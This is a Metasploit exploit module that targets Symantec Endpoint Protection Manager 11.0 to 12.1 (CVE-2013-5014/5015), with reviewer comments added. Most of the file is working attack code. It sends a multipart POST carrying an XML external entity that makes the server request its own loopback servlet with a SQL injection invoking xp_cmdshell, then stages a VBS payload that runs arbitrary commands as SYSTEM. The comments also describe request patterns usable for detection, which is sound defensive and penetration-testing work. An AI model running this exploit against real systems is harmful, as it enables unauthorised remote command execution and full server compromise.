Path: blob/master/modules/exploits/windows/antivirus/symantec_endpoint_manager_rce.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Symantec Endpoint Protection Manager remote command execution
# (CVE-2013-5014 / CVE-2013-5015, see 'References' below).
#
# How the code below works, as far as it is visible here: a multipart POST
# to <TARGETURI>servlet/ConsoleServlet?ActionType=ConsoleLog carries an XML
# document whose DOCTYPE declares an external (SYSTEM) entity pointing at
# the manager's own ConsoleServlet on the loopback interface. That loopback
# URL carries the SQL injection (a `call xp_cmdshell(0x...)` statement), so
# each command chunk produced by the cmdstager is executed by the database
# on the server. Both request shapes are useful detection signatures:
# the outer POST with a DOCTYPE/SYSTEM entity in a form part named
# "Content", and loopback requests with action=test_av whose Parameter
# value contains xp_cmdshell.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include REXML # Document / DocType used in #soap_request
  include Msf::Exploit::CmdStager # execute_cmdstager -> #execute_command
  include Msf::Exploit::Remote::HttpClient # send_request_cgi, target_uri, peer

  # Module metadata and options. RPORT defaults to 9090 and TARGETURI is
  # the base path. CMDSTAGER::FLAVOR is deregistered because #exploit pins
  # the flavor to :vbs.
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Symantec Endpoint Protection Manager /servlet/ConsoleServlet Remote Command Execution',
        'Description' => %q{
          This module exploits XXE and SQL injection flaws in Symantec Endpoint Protection Manager
          versions 11.0, 12.0 and 12.1. When supplying a specially crafted XML external entity (XXE) request an attacker
          can reach SQL injection affected components. As xp_cmdshell is enabled in the included
          database instance, it's possible to execute arbitrary system commands on the target
          with SYSTEM privileges.
        },
        'Author' => [
          'Stefan Viehbock', # Discovery
          'Chris Graham', # PoC exploit
          'xistence <xistence[at]0x90.nl>' # Metasploit module
        ],
        'License' => MSF_LICENSE,
        'References' => [
          ['CVE', '2013-5014'],
          ['CVE', '2013-5015'],
          ['OSVDB', '103305'],
          ['OSVDB', '103306'],
          ['EDB', '31853'],
          ['URL', 'https://www.sec-consult.com/fxdata/seccons/prod/temedia/advisories_txt/20140218-0_Symantec_Endpoint_Protection_Multiple_critical_vulnerabilities_wo_poc_v10.txt']
        ],
        'Arch' => ARCH_X86,
        'Platform' => 'win',
        'Targets' => [
          ['Windows VBS Stager', {}]
        ],
        'Privileged' => true,
        'DisclosureDate' => '2014-02-24',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(9090),
        OptString.new('TARGETURI', [true, 'The base path', '/'])
      ]
    )
    deregister_options('CMDSTAGER::FLAVOR')
  end

  # Fingerprints the target with a single GET to the base path.
  #
  # @return [Exploit::CheckCode] Appears when the response is HTTP 200 and
  #   the body matches both the product banner and the
  #   "1995 - 2013 Symantec Corporation" notice; Safe in every other case,
  #   including when no response is received at all (res is nil).
  def check
    res = send_request_cgi(
      {
        'uri' => normalize_uri(target_uri.path),
        'method' => 'GET',
      }
    )

    if res && res.code == 200 && res.body =~ /Symantec Endpoint Protection Manager/ && res.body =~ /1995 - 2013 Symantec Corporation/
      return Exploit::CheckCode::Appears
    end

    Exploit::CheckCode::Safe
  end

  # Entry point. Hands off to the cmdstager with the VBS flavor and a
  # per-line limit of 3950 characters; the stager calls #execute_command
  # once per chunk.
  def exploit
    print_status("Sending payload")
    # Execute the cmdstager, max length of the commands is ~3950
    execute_cmdstager({ :flavor => :vbs, :linemax => 3950 })
  end

  # Runs one cmdstager chunk on the target.
  #
  # @param cmd [String] command line to run; wrapped in "cmd /c" and
  #   hex-encoded before it is embedded in the SQL statement
  # @param opts [Hash] not used in this method; kept for the CmdStager
  #   callback signature
  # @raise via fail_with when a response arrives whose body lacks
  #   "ResponseCode"
  def execute_command(cmd, opts = {})
    # Convert the command data to hex, so we can use that in the xp_cmdshell. Else characters like '>' will be harder to bypass in the XML.
    command = "0x#{Rex::Text.to_hex("cmd /c #{cmd}", '')}"

    # Generate random 'xx032xxxx' sequence number.
    seqnum = "#{rand_text_numeric(2)}032#{rand_text_numeric(4)}"

    soap = soap_request(seqnum, command)

    # The XML document travels as the form part named "Content" of a
    # multipart/form-data body; the boundary is taken from the MIME object.
    post_data = Rex::MIME::Message.new
    post_data.add_part(soap, "text/xml", nil, "form-data; name=\"Content\"")
    xxe = post_data.to_s

    res = send_request_cgi(
      {
        'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'),
        'method' => 'POST',
        'vars_get' => { 'ActionType' => 'ConsoleLog' },
        'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
        'data' => xxe,
      }
    )

    # NOTE(review): `res and ...` is false when res is nil, so a missing
    # response (e.g. a timeout) is not reported here; only a response whose
    # body lacks "ResponseCode" triggers fail_with. `and` is the
    # low-precedence keyword form; in this statement position it behaves
    # like &&.
    if res and res.body !~ /ResponseCode/
      fail_with(Failure::Unknown, "#{peer} - Something went wrong.")
    end
  end

  # Builds the XML document carrying the external entity.
  #
  # The DOCTYPE declares an entity whose SYSTEM URL is the manager's own
  # ConsoleServlet on 127.0.0.1:9090 with the SQL injection in the
  # Parameter query value; the single child element of <Request> references
  # that entity, so resolving the document makes the server fetch the URL.
  # REXML would escape the quotes and ampersand in those two fragments, so
  # placeholders are serialised first and then replaced with gsub!.
  #
  # @param seqnum [String] SequenceNum value supplied by the caller
  # @param command [String] hex literal (0x...) passed to xp_cmdshell
  # @return [String] the serialised XML document
  def soap_request(seqnum, command)
    # Random entity and element names of 8..15 letters.
    randpayload = rand_text_alpha(8 + rand(8))
    randxxe = rand_text_alpha(8 + rand(8))
    # NOTE(review): the loopback port here is the literal 9090; it does not
    # follow the RPORT option registered in #initialize.
    entity = "<!ENTITY #{randpayload} SYSTEM \"http://127.0.0.1:9090/servlet/ConsoleServlet?"
    entity << "ActionType=ConfigServer&action=test_av&SequenceNum=#{seqnum}&Parameter=';call xp_cmdshell(#{command});--\" >"

    xml = Document.new
    xml.add(DocType.new('sepm', "[ METASPLOIT ]")) # placeholder for the entity declaration
    xml.add_element("Request")
    xxe = xml.root.add_element(randxxe)
    xxe.text = "PAYLOAD" # placeholder for the entity reference

    xml_s = xml.to_s
    xml_s.gsub!(/METASPLOIT/, entity) # To avoid html encoding
    xml_s.gsub!(/PAYLOAD/, "&#{randpayload};") # To avoid html encoding

    xml_s
  end
end